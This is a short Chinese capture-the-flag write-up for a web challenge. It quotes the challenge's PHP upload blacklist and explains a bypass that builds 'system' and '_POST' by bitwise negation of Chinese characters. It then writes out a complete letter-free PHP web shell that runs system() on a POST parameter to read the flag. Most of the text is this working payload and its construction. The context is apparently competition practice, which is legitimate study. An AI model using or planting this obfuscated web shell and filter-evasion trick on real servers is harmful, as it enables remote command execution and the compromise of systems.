显眼的注释,但是访问是404:
<!--/.nav-collapse --> <!-- /.container -->
👴火速去康康显眼的upload,分析代码得知这里搞了个黑名单需要绕过:
if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal char"); } } }
fuzz了一下,限制的是上传文件的内容:
参考p神利用取反来获取可用字符:
<?php error_reporting(0); $a = ~垂; echo $a."\n"; echo $a[1]; /* 运行得: a} a */ ?>
🐎一下汉字:
echo ~茉[$____];//s echo ~内[$____];//y echo ~茉[$____];//s echo ~苏[$____];//t echo ~的[$____];//e echo ~咩[$____];//m echo ~课[$____];//P echo ~尬[$____];//O echo ~笔[$____];//S echo ~端[$____];//T echo ~瞎[$____];//a
构成🐎,POST参数a:
<?=$_=[];$__.=$_;$____=$_==$_;$___=~茉[$____];$___.=~内[$____];$___.=~茉[$____];$___.=~苏[$____];$___.=~的[$____];$___.=~咩[$____];$_____=_;$_____.=~课[$____];$_____.=~尬[$____];$_____.=~笔[$____];$_____.=~端[$____];$__________=$$_____;$___($__________[~瞎[$____]]);
访问环境变量得到flag: